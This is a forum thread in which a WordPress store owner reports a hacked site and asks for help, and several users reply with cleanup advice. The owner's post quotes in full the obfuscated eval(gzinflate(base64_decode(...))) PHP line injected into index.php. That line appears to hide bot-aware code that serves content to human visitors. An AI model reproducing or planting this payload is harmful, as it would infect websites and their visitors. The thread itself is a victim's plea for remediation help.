    Default Site was hacked...need help bad!

    Hi everyone,

    I'm new here! Well long story short, I run a small online store hosted by GoDaddy using wordpress. My site got hacked and I have no idea what to do. :[ If anyone knows how to fix the root of this problem, please let me know. I really need help here! (And yes, if it's something that takes work I can even offer some cash).


    Description of problem:

    When I went to check out the files on the server, I noticed the index.php file had been edited, and the following script was placed in the file:

    <?php eval(gzinflate(base64_decode('AFAGr/lpZiAoIWlzc2V0KCRmdGwpKXsgZ2xvYmFsICRmdGw7JGZ0bD0x Ow0KCQllcnJvcl9yZXBvcnRpbmcoMCk7DQoJCWlmKCFwcmVnX2 1hdGNoKCcjYm90fHNwaWRlcnxjcmF3bHxzbHVycHx5YW5kZXgj aScsICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkpew0KCQ lwcmludChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgnN0wwSFlC eEpsaVVtTDIzS2UzOUs5VXJYNEhTaENJQmdFeVRZa0VBUTdNR0 l6ZWFTN0IxcFJ5TXBxeXFCeW1WV1pWMW1Ga0RNN1oyODk5NTc3 NzMzM252dnZmZTZPNTFPSi9mZi96OWNabVFCYlBiT1N0ckpuaU dBcXNnZlAzNThIejhpSGpmVHVsaTFSNWVmZlhTWmZmVEpSK1ZI aDIxOS9Zdnp5VVdUMTVOUFBqbjhKZE9zbmM2M21tV2RYOVR2N3 Z4aWZMdjFSZGJPUC9ub296dGJkL1RySDdTVHZMM3ppeGVmNFp2 RC9QS3pxMkk1cTY2Kzl4R0J6RC82NVBMN2g3L2svUHl6ajg3cm FuRkNIODJ6anc2TDg2MmR2KWWHNQUHR0NXQ3dHo1L3o4azg4K3F2 RlZOY3MvT2x4Kzl0SGUvVi80Qy9jKy9ZVy9jSGR2bC83WmZmZ0 xmK0grd1MvOGhmY2Y0QS8rK0FDL1VhUGRlL3Y0RTcvdDRqTis2 ZDY5WC9nTFA5M0RYenY0L0lGK2RIRGZObjFnbXNwdjNHSlAvem 5nWHdCc2gxOUhCOERnSWI5NXozOFRDTjNuanhuMEEvMTQ5eDQr LzFRUjNpRlFuektRSGYxa24zN1pleWdqN0k5MDk1N3QxbzNybn I2TC96LzROSHg5ZDM5UDZLTWt3SnM4R3VDeXp4RHBIMEF3blhs RXNDUzlGNHpNMGVSVGZINlBTUTBNR1UxdWF3bEFnQjg4TUY4Tm pZRHhFeHJ6bDUvS1MvZDU2UGlFWVhJRGpPM0J2aENOZTVjcFoz QThyUHY2SjgveDBKZUtya1VITENOTVllakovVW9IYU1YRFpnb0 NwTXdZTitWaGhkUmh3aGhjQlgvR21udGpYSGExS1FiNVlFZitm OTlONXdCTXRQNzBRRnJLelBGdzdEaGxrZ0JPRzMycXFJS09UR0 xic2I3MTBIekc0SWZlc3N3dmpMOW5CbStuU0FiRkRYYk5iN3Yy TTBkK0MrTUJmMlE1Um9qTFkrVU9NUDFXa0dWR0xGeGhBdjdIY0 NKRDI3WC8zSE5mTW1QZU0vOHd4UzFEeUdRZTZKZk1VdFQ4Z1gx RklCaHUwNjh3M0FjNmRHWU9HZXZBckdIR0lRRDNEK1J0WDhwMj kzYzdId2lVZlF1QUtkc2ZyVXprcG03NU05WXczQ0FtM3N3NS9C YmFpbnA0S0w5Z2VQTEJlNmdBMGJadUxwMldPYmlOYXJXcWN1Tz RlRWhtRHRIb1V6TUFmV1hQNkdmK2g3L2NzVUFacFFBdmhzZEQy elgvWUJ6NDZOTWQvZXBIMnNmQTlMV1BZV2pHampzYjBoSHlKUS 9jNkJsRndINjI1NzVsT2dNcjdXZXpqbUJodkQwV1FnOHpISzlI NmNSQXRYM2ZVcU84THhaV0RzUVk3cmtlb1dUd004TGZsakx1Zm ZuU2NnMyt1UVdnRHhRVUo2Tk9KZXpJbDBaa1B2VVFHT0FUNTNT NXNmR1hicllqZExZNndySkR4SWpkaE1rSE9Ub2lpNWFDVnJxRk k2MEU3VmxBR05DQm5ib2RKMW1FeFVQTFh2Wk5TMmY1R0xBRUta MVgxdWM3RDJSVXV6c1BEVm9NOHFGOXhlS0FJWEQzVG95a0wvUm pWTXFBY2ZwbzNLektvdDM2NkJmK3dvL3VITTQvMnp0c1B2dUlY ZlBGbmZPcTNpbysyemtzdGovZHUvKzc0cGZQZGo4cDd2eml0NT hWYUNBTy9uaFdUZGVMZk5uZWFUNzU3SFZiRjh1TDc1MmZmMzly K2IzaSs5dnc3ejhwZnZmNW5UdUh2K1FIbnpYaThlOSt4aTcvN3 AzOGN1c0g5TVhqdXhxQi9EOEJBQUQvL3c9PScpKSk7DQoJCX0N Cn0NCgEAAP//')));?>

    I erased this script, re-uploaded the file, and the site was restored to how it was before. I changed the GoDaddy account password and the FTP account password to avoid this happening again. However, within 24 hours of this, the site was crashed again and the same script had been placed in the index.php file.

    So yeah, obviously not sure what to do or how to find the problem. If anyone knows anything, or wants to help and possibly earn some cash, please let me know!

    Chris G
    Respected Member
    You are probably keylogged. Try formatting everything and scan your PC for viruses. Once done, install KeyScrambler, change your passwords and try reverting to your old backup. Should work fine.

    The warning message you see is due to a blank line at the beginning or end of one of your files. PHP does not like blank lines.
    Also it may mean that some of your files are still infected and you could get more malware. I can tell you from experience that you probably have been exploited through a weak password or Wordpress vulnerability and there is surely a backdoor script on your account. If you want more details or assistance let me know and I can provide you with my knowledge further.
    I do cleanups on infected sites on a daily basis.

    Thanks for all the help guys! I'm doing my best to try and understand what all this means, but everything will be passed onto my IT guy. Hopefully we can figure this out ASAP.

    If you have FTP & SQL backups no worry about it.

    Now this Error MSG comes

    "Reported Attack Page!
    This web page at ur domai has been reported as an attack page and has been blocked based on your security preferences."

    Unlike the previous post, you should worry about it.

    Get an sql backup immediately. Then hunt for another wordpress theme. After that reformat your vps/server (Are you on a shard host?). Then start again with the new theme and the old sql file.

    Does anyone suggest a site/service I can hire to clean the site and return it to the way it ways/listings back on google?

    Dude your site was hacked the following way
    One of your plugins is vulnerable to file upload vulnerability , the hacker uploaded its malicious file(his own index.php) and then defaced your site
    Solution : Fix your security
    Its nothing related to godaddy, its wordpress
    1.Update to latest versions
    2.Triple check your plugins and update them all
    3.Change your wordpress admin password
    4.Do a check on your server to see if hacker uploaded a backdoor shell to the site , check if any php file have been backdoored
    You are good to go
    Helping people is my hobby.....
    Learn how to secure your server against ddos

    Update your WP to latest version. After that scan for viruses. Then change all your passwords to at least 12 char randomly generated passowords. Why? Because they are REALLY hard to crack (if hes getting your password hash in the first place, which I doubt)

